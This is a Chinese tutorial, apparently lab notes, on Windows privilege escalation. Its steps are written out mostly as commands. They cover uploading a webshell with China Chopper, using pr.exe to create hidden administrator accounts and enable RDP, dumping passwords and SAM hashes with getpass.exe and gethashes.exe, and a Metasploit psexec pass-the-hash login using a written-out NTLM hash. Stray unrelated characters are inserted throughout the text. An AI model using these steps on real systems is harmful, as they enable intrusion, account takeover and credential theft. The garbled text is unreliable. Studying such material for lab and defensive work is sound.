一悲幅、常見提權(quán)方法?
1套鹅、溢出漏洞提權(quán)
2、數(shù)據(jù)庫提權(quán)
3汰具、第三方軟件提權(quán)
二卓鹿、Cmd命令無法執(zhí)行原因分析
1、Cmd命令無法執(zhí)行分析
??????? 主要原因是cmd.exe被管理員降權(quán)或刪除留荔,也有可能組件被刪除吟孙。
2、Cmd命令執(zhí)行解決方法
?????? 通過腳本木馬查找可讀可寫目錄聚蝶,上傳cmd杰妓,調(diào)用cmd路徑執(zhí)行命令(找可讀可寫目錄不要選帶空格目錄)。
?????? 菜刀設(shè)置終端路徑:setpc:\test\cmd.exe
三碘勉、提權(quán)常用命令講解(windows系統(tǒng))
whoami ——查看用戶權(quán)限
systeminfo ——查看操作系統(tǒng)巷挥,補(bǔ)丁情況
ipconfig——查看當(dāng)前服務(wù)器IP ipconfig /all
net user——查看當(dāng)前用戶情況
netstat ——查看當(dāng)前網(wǎng)絡(luò)連接情況? netstat –ano? /netstat –an
| find “ESTABLISHED”
tasklist ——查看當(dāng)前進(jìn)程情況 tasklist /svc
taskkill ——結(jié)束進(jìn)程 taskkill -PID xx
net start? ——啟動(dòng)服務(wù)
net stop ——停止服務(wù)
net user best 123456 /add 添加用戶名為best,密碼為123456
net localgroup administrators best /add 將用戶名為best的用戶添加到管理員組
net user best /del 刪除best用戶
四验靡、完成windows溢出提權(quán)實(shí)驗(yàn)(提權(quán)工具pr.exe)
首先將一句話木馬上傳到虛擬機(jī)中倍宾,然后打開
查看當(dāng)前用戶是什么用戶
選擇進(jìn)入目錄cd c:\wmpub
查看當(dāng)前屬于什么用戶? ? ?whoami
然后上傳pr.exe工具到c:wmpub目錄(找可讀可寫目錄不要選帶空格目錄)
添加用戶執(zhí)行命令:pr.exe "net user 123 123 /add"
刪除用戶命令執(zhí)行:pr.exe "net user 123 /del"
利用工具開啟3389遠(yuǎn)程連接
首上傳開啟3389工具雏节,然后用命令執(zhí)行
五、本地管理員密碼如何直接提取(或者用cs工具獲仍浔觥)
用菜刀上傳getpass.exe?工具
pr.exe "getpass.exe >>c:\wmpub\1.txt"
如果菜刀操作超時(shí)時(shí)矾屯,我們可以在本機(jī)上執(zhí)行,打開cmd運(yùn)行初厚,輸入getpass.exe
讀取hash值,使用gethashes.exe工具
pr.exe "gethashes.exe $local"
找到sam文件孙技,這個(gè)文件是存儲(chǔ)操作系統(tǒng)賬號(hào)密碼的文件产禾,是hash加密的
利用kali遠(yuǎn)程連接(通過低版kail2.0完成hash遠(yuǎn)程連接)
root@kalieee:~# msfconsole
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhost 192.168.2.107
msf5 exploit(windows/smb/psexec) > set smbuser administrator
msf5 exploit(windows/smb/psexec) > set smbpass 970E5570CCBF26E2AAD3B435B51404EE:C024BB7D17DDFF2CC270255F56FA4B24
msf5 exploit(windows/smb/psexec) > exploit